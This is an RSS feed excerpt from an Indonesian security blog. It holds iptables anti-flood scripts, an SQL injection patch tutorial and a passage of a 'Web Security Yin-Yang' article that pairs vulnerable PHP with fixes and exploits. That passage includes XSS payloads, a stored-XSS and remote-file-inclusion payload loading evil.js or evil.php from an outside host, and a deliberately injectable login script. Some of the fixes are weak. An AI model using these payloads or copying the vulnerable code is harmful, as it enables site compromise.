<p>Posting <a href="https://www.james0baster.web.id/2010/08/07/poc-buat-ngedeface/">POC buat ngedeface++</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.james0baster.web.id/2010/08/07/poc-buat-ngedeface/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mencegah serangan Syn &#038; Ping Flood Attack (DOS)</title>
		<link>https://www.james0baster.web.id/2010/08/07/mencegah-serangan-syn-ping-flood-attack-dos/</link>
					<comments>https://www.james0baster.web.id/2010/08/07/mencegah-serangan-syn-ping-flood-attack-dos/#respond</comments>
		
		<dc:creator><![CDATA[james0baster]]></dc:creator>
		<pubDate>Sat, 07 Aug 2010 02:46:29 +0000</pubDate>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[hack]]></category>
		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=153</guid>

					<description><![CDATA[<p>1. Mencegah paket Syn Flood Attack Buat sebuah file bernama closesyn.sh yang isinya sebagai berikut untuk mencegah serangan syn flood #!bin/sh #Menghapus semua Rule iptables -F iptables -X iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -P FORWARD ACCEPT #blok paket syn yang dicurigai jahat iptables -N synjahat iptables -A INPUT -p tcp &#8211;syn [&#8230;]</p>
<p>Posting <a href="https://www.james0baster.web.id/2010/08/07/mencegah-serangan-syn-ping-flood-attack-dos/">Mencegah serangan Syn &#038; Ping Flood Attack (DOS)</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>1. Mencegah paket Syn Flood Attack<span id="more-153"></span><br />
Buat sebuah file bernama closesyn.sh yang isinya sebagai berikut untuk mencegah serangan syn flood</p>
<blockquote><p>#!bin/sh<br />
#Menghapus semua Rule<br />
iptables -F<br />
iptables -X<br />
iptables -P INPUT ACCEPT<br />
iptables -P OUTPUT ACCEPT<br />
iptables -P FORWARD ACCEPT<br />
#blok paket syn yang dicurigai jahat<br />
iptables -N synjahat<br />
iptables -A INPUT -p tcp &#8211;syn -j synjahat<br />
iptables -A synjahat -m limit &#8211;limit 1/s &#8211;limit-burst 3 -j ACCEPT<br />
iptables -A synjahat -j DROP</p></blockquote>
<p>kemudian jalankan di konsole/terminal</p>
<blockquote><p>root@bt:~# sh closesyn.sh</p></blockquote>
<p>2. Mencegah Ping Flood attack<br />
Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah serangan ping flood</p>
<blockquote><p>#!bin/sh<br />
#Menghapus semua Rule<br />
iptables -F<br />
iptables -X<br />
iptables -P INPUT ACCEPT<br />
iptables -P OUTPUT ACCEPT<br />
iptables -P FORWARD ACCEPT<br />
#blok paket ping(icmp) yang dicurigai jahat<br />
iptables -N pingjahat<br />
iptables -A INPUT -p icmp -j pingjahat<br />
iptables -A pingjahat -m limit &#8211;limit 1/s &#8211;limit-burst 2 -j ACCEPT<br />
iptables -A pingjahat -j DROP</p></blockquote>
<blockquote><p>root@bt:~# sh closeping.sh</p></blockquote>
<p>coba lakukan testing dengan perintah</p>
<blockquote><p>root@bt:~#ping [target] -s 6500</p></blockquote>
<p>Ok sekian dulu. Thank&#8217;s jika ada yang kurang jelas silahkan tanya 😀</p>
<p><sub>This article was originally published in forum thread: <a rel="nofollow" href="http://www.indonesianhacker.or.id/content/threads/5121-Mencegah-serangan-Syn-amp-Ping-Flood-Attack-(DOS)" target="_self">Mencegah serangan Syn &amp; Ping Flood Attack (DOS)</a> started by bilanganbiner</sub></p>
<p>Posting <a href="https://www.james0baster.web.id/2010/08/07/mencegah-serangan-syn-ping-flood-attack-dos/">Mencegah serangan Syn &#038; Ping Flood Attack (DOS)</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.james0baster.web.id/2010/08/07/mencegah-serangan-syn-ping-flood-attack-dos/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>SQL Injection Flaw Patching</title>
		<link>https://www.james0baster.web.id/2010/02/24/sql-injection-flaw-patching/</link>
					<comments>https://www.james0baster.web.id/2010/02/24/sql-injection-flaw-patching/#respond</comments>
		
		<dc:creator><![CDATA[james0baster]]></dc:creator>
		<pubDate>Wed, 24 Feb 2010 06:35:51 +0000</pubDate>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[hack]]></category>
		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=104</guid>

					<description><![CDATA[<p>SQL Injection Flaw Patching diambil dari http://www.indonesianhacker.org/showthread.php?t=529 yang diposting oleh v4mp Jangan cuma bisa attack. Tapi juga harus bisa defend.  Langsung aja.. Ini patch untuk mencegah serangan SQL Injection di halaman dinamis pada PHP + MySQL. Biasanya halaman dinamis ini bentuknya kayak gini http://uhui.com/vuln.php?id=[Input_Angka] Bentuk umum kode di halaman dinamis php untuk membaca database melalui MySQL : PHP [&#8230;]</p>
<p>Posting <a href="https://www.james0baster.web.id/2010/02/24/sql-injection-flaw-patching/">SQL Injection Flaw Patching</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>SQL Injection Flaw Patching diambil dari <a rel="nofollow" href="http://www.indonesianhacker.org/showthread.php?t=529">http://www.indonesianhacker.org/showthread.php?t=529</a> yang diposting oleh v4mp</p>
<p>Jangan cuma bisa attack. Tapi juga harus bisa defend. </p>
<p>Langsung aja..</p>
<p>Ini patch untuk mencegah serangan SQL Injection di halaman dinamis pada PHP + MySQL.<span id="more-104"></span></p>
<p>Biasanya halaman dinamis ini<br />
bentuknya kayak gini <a rel="nofollow" href="http://uhui.com/vuln.php?id=" target="_blank">http://uhui.com/vuln.php?id=</a>[Input_Angka]</p>
<p>Bentuk umum kode di halaman dinamis php untuk membaca database melalui MySQL :</p>
<div>
<div>PHP Code:</div>
<div dir="ltr"><code><code>$id = htmlentities($_GET['id']);<br />
$variabel = mysql_query("select *from tabeltarget where idtarget='$id'")<br />
</code></code></div>
</div>
<p>Injection Flaw terjadi karena inputnya gak kefilter dengan baik. Sehingga input &#8216;$id&#8217; yang seharusnya diisi dengan (biasanya) angka bisa diisi dengan query SQL.. Yang mengakibatkan query SQL tersebut dieksekusi sehingga injector bisa melakukan berbagai hal misalnya membaca isi database, membaca suatu file di situs tersebut, dll.</p>
<p>Nah, untuk mencegah hal tersebut sebaiknya kita memfilter inputnya sebelum diproses dengan SQL.</p>
<p>Contoh kode filternya :</p>
<div>
<div>PHP Code:</div>
<div dir="ltr"><code><code>error_reporting(0);<br />
class filter{<br />
function filtering($id){<br />
$idfilter = mysql_real_escape_string($id);<br />
if (!ctype_digit($idfilter))<br />
{<br />
echo "Can't process your request, dude :P ";<br />
exit;<br />
}<br />
else if ($idfilter &lt;= 0)<br />
{<br />
echo "Can't process your request, dude :P  ";<br />
exit;<br />
}<br />
else<br />
{<br />
return $id;<br />
}<br />
}<br />
}<br />
$Filter2 = new filter();<br />
$id = htmlentities($_GET['id']);<br />
$secured = $Filter2-&gt;filtering($id);<br />
$variabel = mysql_query("select *from tabeltarget where idtarget='$secured'")<br />
</code></code></div>
</div>
<p>Penjelasan :</p>
<p>Pertama-tama menggunakan <strong>error_reporting(0);</strong> . Kode tersebut digunakan untuk mendisable error reporting sehingga jika terjadi error tidak keluar pesan error.</p>
<p>Selanjutnya variabel <strong>$id</strong> disaring dulu menggunakan <strong>mysql_real_escape_string</strong> yang berfungsi untuk menambahkan slash (\) apabila ada tanda kutip pada input <strong>$id</strong>.</p>
<p>Setelah disaring dengan <strong>mysql_real_escape_string</strong>, disaring lagi dengan melakukan pengecekan apakah inputnya berupa angka atau bukan dengan menggunakan kode <strong>!ctype_digit</strong> . Jika ternyata bukan angka maka akan ditolak. Selain pengecekan input apakah angka atau bukan, dilakukan juga pengecekan apakah inputnya sama atau lebih kecil dari 0 (minus) jika iya maka akan ditolak.</p>
<p>Abis itu baru deh aplikasikan ke syntax SQL-nya.</p>
<p>Untuk lebih jelasnya silahkan baca ulang kode sebelum difilter dan setelah difilter berkali-kali sampai paham.</p>
<p>Posting <a href="https://www.james0baster.web.id/2010/02/24/sql-injection-flaw-patching/">SQL Injection Flaw Patching</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.james0baster.web.id/2010/02/24/sql-injection-flaw-patching/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Web Security Yin-Yang (Attacking &#038; Defending)</title>
		<link>https://www.james0baster.web.id/2010/02/23/web-security-yin-yang-attacking-defending/</link>
					<comments>https://www.james0baster.web.id/2010/02/23/web-security-yin-yang-attacking-defending/#respond</comments>
		
		<dc:creator><![CDATA[james0baster]]></dc:creator>
		<pubDate>Tue, 23 Feb 2010 04:14:08 +0000</pubDate>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[hack]]></category>
		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=98</guid>

					<description><![CDATA[<p>WEB SECURITY YIN-YANG Ditulis oleh: gentoo &#8220;If you know both yourself and your enemy, you can win a hundred battles without a single loss.&#8221; Di berbagai segi kehidupan, sangatlah di butuhkan keseimbangan. Bahkan yang sangat terkenal adalah sebuah ungkapan dari Sun Tzu yang saya tuliskan diatas, mengenali kelemahan musuh adalah penting, tetapi lebih penting lagi [&#8230;]</p>
<p>Posting <a href="https://www.james0baster.web.id/2010/02/23/web-security-yin-yang-attacking-defending/">Web Security Yin-Yang (Attacking &#038; Defending)</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><a href="http://www.james0baster.web.id/wp-content/uploads/2010/02/changes400x300.jpg"><img loading="lazy" decoding="async" class="alignleft size-full wp-image-99" title="changes400x300" src="http://www.james0baster.web.id/wp-content/uploads/2010/02/changes400x300.jpg" alt="Web Security Yin-Yang" width="240" height="180" /></a>WEB SECURITY YIN-YANG</p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">Ditulis oleh: gentoo</span></p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><span style="color: #000000;">&#8220;If you know both yourself and your enemy, you can win a hundred battles without a single loss.&#8221;</span></span></span></p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><span style="color: #000000;">Di berbagai segi kehidupan, sangatlah di butuhkan keseimbangan. Bahkan yang sangat terkenal adalah sebuah ungkapan dari Sun Tzu yang saya tuliskan diatas, mengenali kelemahan musuh adalah penting, tetapi lebih penting lagi mengenali kelemahan diri sendiri,<span id="more-98"></span> karena dengan begitu kita dapat seimbang dala, bertahan dan menyerang.  Saya harap artikel ini nantinya akan dapat menjadi referensi singkat yang membahas tentang menyerang dan bertahan dalam dunia keamanan web (web security), dan artikel ini diharapkan juga bisa menjadi titik mula bagi yang tertarik dengan keamanan web, sekaligus pembuka mata bagi para programmer web agar sedikit banyak mulai menaruh perhatian pada keamanan aplikasi yang meraka buat.  Artikel ini akan membahas beberapa jenis celah keamanan web yang umumnya selalu menjadi primadon dikalangan para pemerhati keamanan web, tetapi bahasan disini bukan mencakup detil tiap celah, tetapi lebih ke arah Proof-of-concept dari cara bertahan dan menyerang. Disajikan dengan menggunakan PHP sebagai bahasa pemrograman &#8220;dynamic&#8221;, HTML, serta mysql sebagai &#8220;database engine&#8221;.  Formatnya pun akan selalu sama, penyajian kode yang memiliki celah, cara memperkuatnya (bertahan) kemudian diikuti dengan bagaimana metode untuk mengexploitasinya. Jangan berharap artikel ini akan mengajarkan anda dari Nol, bagaimana membuat web, mengkode dengan PHP dan mysql, atau penjelasan detil (pengertian-panjang-lebar) tentang setiap celah.  Partisipasi aktif andalah yang akan menentukan apakah artikel ini akan bermanfaat buat anda nantinya</span></span></span></p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><span style="color: #000000;">===// Yin-Yang \\===</span></span></span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">====// XSS Reflected \\====<br />
kode yang memiliki celah untuk di serang:</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\ sweet.php<br />
PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">echo &#8216;Selamat Datang&#8217; . $_GET[&#8216;sweet&#8217;];</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//<br />
Adapun kode untuk melindungi adalah dengan menambahkan fungsi &#8220;strip_tags&#8221; atau &#8220;htmlspecialchars&#8221; untuk memeriksa variabel tersebut terlebih dahulu.<br />
&#8212;&#8212;&#8211;\\sweet-patch.php<br />
PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">echo &#8216;Selamat Datang&#8217; . strip_tags($_GET[&#8216;sweet&#8217;]); </span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">atau PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">echo &#8216;Selamat Datang&#8217; . htmlspecialchars($_GET[&#8216;sweet&#8217;]);</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;<br />
Code:sweet.php?sweet=&lt;script&gt;alert(&#8220;XSS&#8221;)&lt;/script&gt;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">====// XSS Persistent \\====</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"> kode yang memiliki celah untuk di serang:</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\ sweet.php<br />
PHP Code: </span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">$sweet  = trim($_POST[&#8216;txtSweet&#8217;]);$sweet  = mysql_real_escape_string($sweet);$query  = &#8220;INSERT INTO sweet (sweet) VALUES (&#8216;$sweet&#8217;);&#8221;;</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//<br />
Adapun fungsi yang digunakan untuk mengamankannya adalah &#8220;stripslashes&#8221;, &#8220;addslashes&#8221;, &#8220;htmlspecialchars&#8221;<br />
&#8212;&#8212;&#8211;\\sweet-patch.php<br />
PHP Code: </span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">$sweet = stripslashes($sweet);$sweet = mysql_real_escape_string($sweet);$sweet = htmlspecialchars($sweet);$query = &#8220;INSERT INTO sweet (sweet) VALUES (&#8216;$sweet&#8217;);&#8221;;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;">&#8212;&#8212;&#8211;//</p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;<br />
Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">sweet.php?sweet=&lt;SCRIPT SRC=http://dare.dev.il/evil.js?&lt;B&gt;Bedanya, xss exploit ini akan tersimpan ke database dan akan selalu di eksekusi setiap halaman sweet.php di load, selanjutnya tinggal keahlian anda berkreasi pada script evil.js</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
====// File Inclusion \\====</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"> Kode yang memiliki celah untuk di serang:</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\berkas.php<br />
PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">$file = $_GET[&#8216;halaman&#8217;];</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">Adapun Untuk mengamankan berkas.php, cukup dengan mendefinisikan file yangingin kita include secara pasti.<br />
&#8212;&#8212;&#8211;\\berkas-patch.php<br />
PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">$file = $_GET[&#8216;halaman&#8217;];</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">// hanya mengijinkan sweet.phpif ( $file != &#8220;sweet.php&#8221; ) {echo &#8220;ERROR: File not found!&#8221;;exit;}</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">|&#8212;&#8212;| Atau untuk melengkapinya, silahkan melakukan serring &#8220;Off&#8221; pada Directive| allow_url_fopen| allow_url_include| pada php.ini|&#8212;&#8212;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">Code:berkas.php?halaman=http://dare.dev.il/evil.phpSelanjutnya tergantung keahlian anda berkreasi pada script evil.php, agar berbagai perintah dalam evil.php dapat tereksekusi, ada beberapa syarat lain yang harus dipenuhi, dan ini menjadi PR anda untuk mencari tahu.</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
====// SQL Injection \\====</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">SQL injection adalah salah satu teknik yang cukup tua untuk dibahas, celah ini pada web aplikasilah yang paling banyak memberikan andil kepada terkuasainya banyak webserver. Celah ini bisa saya bilang multiplatform karena bisa Database dapat berpasangan dengan bahasa permrograman apapun dan berjalan di sistem-operasi apapun.<br />
Untuk teknik ini saya tidak ingin panjang lebar, tetapi khusus untuk celah lawas ini, kode yang akan saya berikan lengkap, dan bagi para pencinta &#8220;salin &amp; tempel&#8221; akan dengan mudah dapat mengapliaksikannya, hmm sepertinya tidak juga, karena setidaknya kamu harus paham database, membuat tabel dan mengkoneksikannyadengan php<br />
Ok, berikut adalah kode yang telah memiliki tempat sendiri dalam sejarah keamanan aplikasi web 😆</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;//vulnlogin.php</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">&lt;table&gt;&lt;form name=&#8221;member&#8221; method=&#8221;post&#8221; action=&#8221;#&#8221;&gt;&lt;tr&gt;&lt;td colspan=&#8221;2&#8243;&gt;&lt;b&gt;Member Login&lt;/b&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Username&lt;/td&gt;&lt;td&gt;&lt;input type=&#8221;text&#8221; name=&#8221;username&#8221; value=&#8221;&#8221; size=&#8221;40&#8243;&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Password&lt;/td&gt;&lt;td&gt;&lt;input type=&#8221;password&#8221; name=&#8221;password&#8221; value=&#8221;&#8221; size=&#8221;40&#8243;&gt;&lt;/tr&gt;<br />
&lt;tr&gt;&lt;td colspan=&#8221;2&#8243;&gt;&lt;input type=&#8221;submit&#8221; name=&#8221;submit&#8221; value=&#8221;Submit&#8221;&gt;&lt;input type=&#8221;reset&#8221; name=&#8221;reset&#8221; value=&#8221;Reset&#8221;&gt;&lt;/td&gt;&lt;/form&gt;&lt;/table&gt;<br />
&lt;?phpinclude &#8216;config.php&#8217;; // ini adalah konfigurasi koneksi aplikasi ke database,ga bisa buat? 😆<br />
$username = $_POST[&#8216;username&#8217;];$password = $_POST[&#8216;password&#8217;];<br />
$q = &#8220;SELECT username, password FROM member WHERE username = &#8216;$username&#8217; AND \password = &#8216;$password&#8217; &#8220;;<br />
$r = mysql_query($q);if (!$r) {print mysql_error();} else {$row = mysql_fetch_row($r);if (($row[0] != &#8220;&#8221;) &amp;&amp; ($row[1] != &#8220;&#8221;)) {echo &#8220;&amp;nbsp;&amp;nbsp;&lt;a href=somerandompagesnameforyou.php&gt;Yeah, you are in!&lt;/a&gt;&#8221;;} else {echo&#8221;&lt;pre&gt; &amp;nbsp;&amp;nbsp;You need to register as a member to login! &lt;/pre&gt;&#8221;;}}<br />
?&gt;</span></p>
</blockquote>
